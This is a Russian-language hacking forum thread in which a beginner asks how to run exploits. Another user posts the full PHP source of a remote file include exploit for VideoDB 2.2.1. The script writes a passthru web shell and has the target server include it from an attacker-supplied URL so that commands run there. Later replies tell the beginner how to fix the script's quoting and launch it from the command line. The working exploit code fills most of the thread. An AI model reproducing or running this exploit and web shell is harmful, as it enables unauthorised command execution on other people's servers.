|
Exploit хм пользоватса не умею..
блин один чувак мне показывал как работать с експлотами.Я чота тож захотел но не понял как пользоватся.Сначала он мне сказал скачать perl 5.8.8
я скачал и не дало ни какова ефекта.Что мне делать?и как запустить |
Здесь описание, как прально ставить и настраивать апач на домашней тачке http://video.antichat.org/file23.html
Может и заработает сплоит, если все грамотно установишь |
Цитата:
смотри сюда http://forum.antichat.ru/thread26510.html вот видео как комплить сплоиты http://zxcvasd.jino-net.ru/video.rar |
~!DoK_tOR!~ , спасиб
AdvLamer,Я скачал но чота не запускает говорит ошибка |
2killaye
Ну извини, ты бы как-нить поконкретнее ситуацию обрисовал, а то мало ли ошибка там |
вот низнаю чувак мне прслал этот експлойт
у меня чота не работает <?php /* ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +:+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+#+# #+# #+# ######### ########## ### ########### ########## ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+# #+# #+# ### ########## ### ### ### ### +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - VideoDB <= 2.2.1 Remote File Include Exploit + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: VideoDB 2.2.1 - [Script site: http://sourceforge.net/projects/videodb/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: Kacper (a.k.a Rahim) + - DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam + - Contact: kacper1964@yahoo.pl - or - http://www.rahim.webd.pl/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: DragonHeart ;-) - Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus - SkD, nukedclx, Ramzes - - Greetz for all users DEVIL TEAM IRC Channel !! !@ Przyjazni nie da sie zamienic na marne korzysci @! + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Z Dedykacja dla osoby, - bez ktorej nie mogl bym zyc... - K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mala instrukcja exploita: w pliku: core/pdf.php znajdziemy kod: .... define('FPDF', $config['pdf_module']); define('FPDF_FONTPATH', FPDF.'/font/'); require_once FPDF.'/fpdf.php'; require_once './core/functions.php'; require_once './engines/engines.php'; require_once './core/VariableStream.class.php'; .... jak widaæ jest define, lecz ciagle funkcja FPDF nie jest przypisana, gratuluje pomyslu autorowy :) */ $cmd = $_POST["cmd"]; $glowna = $_POST["glowna"]; $shell = $_POST["shell"]; $exp= "<title>VideoDB <= 2.2.1 Remote File Include Exploit :: DEVIL TEAM :: The Best Polish Team ::</title>" ."<style type="text/css">" ."body {background-color: #000000;}" ."body,td,th {color: #FFFFFF;}" ."</style><form method="post" action="".$glowna.$shell."?cmd=".$cmd."">" ."<div align="center"><img src="http://www.rahim.webd.pl/index_r2_c3.jpg"></div>" ."<p align="center">script url: (ex. http://www.site.com/[videodb_path]/core/pdf.php?config[pdf_module]=)<br>" ."<input type="text" name="glowna" size="90"".$glowna."">" ."<br>" ."shell url: (ex. http://www.site.com/[path]/shell.txt?) shell.txt (CHMOD 777)<br>" ."<input type="text" name="shell" size="90"".$shell."">" ."<br>" ."cmd: (ex. ls -la)<br>" ."<input name="cmd" type="text" size="90"".$cmd."">" ."<br>" ."<input type="submit" value="Exploit" name="submit">" ."</p>" ."<p align="center">Find by: <a href="mailto:kacper1964@yahoo.pl">Kacper</a> (a.k.a <a href="mailto:kacper1964@yahoo.pl">Rahim</a>)<br>" ."<br>" ."DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam<br>" ."<br>" ."Contact: <a href="mailto:kacper1964@yahoo.pl">kacper1964@yahoo .pl</a><br>" ."or</p>" ."<p align="center"> <a href="http://www.rahim.webd.pl/">http://www.rahim.webd.pl/</a></p>" ."<p align="center" class="name"> </p>" ."<HR WIDTH="650" ALIGN="center">" ."<p align="center"> Z Dedykacja dla osoby,<br>" ."bez ktorej nie mogl bym zyc...<br>" ."K.C:* J.M (a.k.a Magaja)</p>" ."<p align="center"> </p>" ."<p align="center"> Special Greetz: DragonHeart ;-)<br>" ."Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi<br>" ."SkD, nukedclx, Ramzes<br>" ."<br>" ."Greetz for all users DEVIL TEAM IRC Channel !!<br>" ."!@ Przyjazni nie da sie zamienic na marne korzysci @!</p>" ."<HR WIDTH="650" ALIGN="center">" ."<p align="center"> </p>" ."</form>"; if (!isset($_POST['submit'])) { echo $exp; }else{ $file = fopen ("shell.txt", "w+"); fwrite($file, '<?php ob_clean();echo"Hacker_Kacper_Made_in_Poland:)";in i_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'); fclose($file); $file = fopen ($shell, "r"); if (!$file) { echo "<p>Don't Find shell :( Insert in FTP shell.txt.n"; exit; } echo $exp; while (!feof ($file)) { $line .= fgets ($file, 1024)."<br>"; } $tpos1 = strpos($line, "++BEGIN++"); $tpos2 = strpos($line, "++END++"); $tpos1 = $tpos1+strlen("++BEGIN++"); $tpos2 = $tpos2-$tpos1; $output = substr($line, $tpos1, $tpos2); } ?> |
Там все кавычки внутри строк, которые конкатенируются, должны быть экранированы \" или заменены на '
|
блин не могу запустить чота всё равно не получаетса добавь в мсн vodka-13@hotmail.com
если можеш не доганяю.. |
Какй нафиг перл?? Это ж плюха)
1. качай php 2. пуск - выполнить - cmd 3. в консоли пишешь - путь до php, путь до сплоеда. c:\php\php.exe c:\sploed 4. всё |
а может стоит perl поучить))?? как думаешь??
хлтяб начало почитай... |
| Время: 09:37 |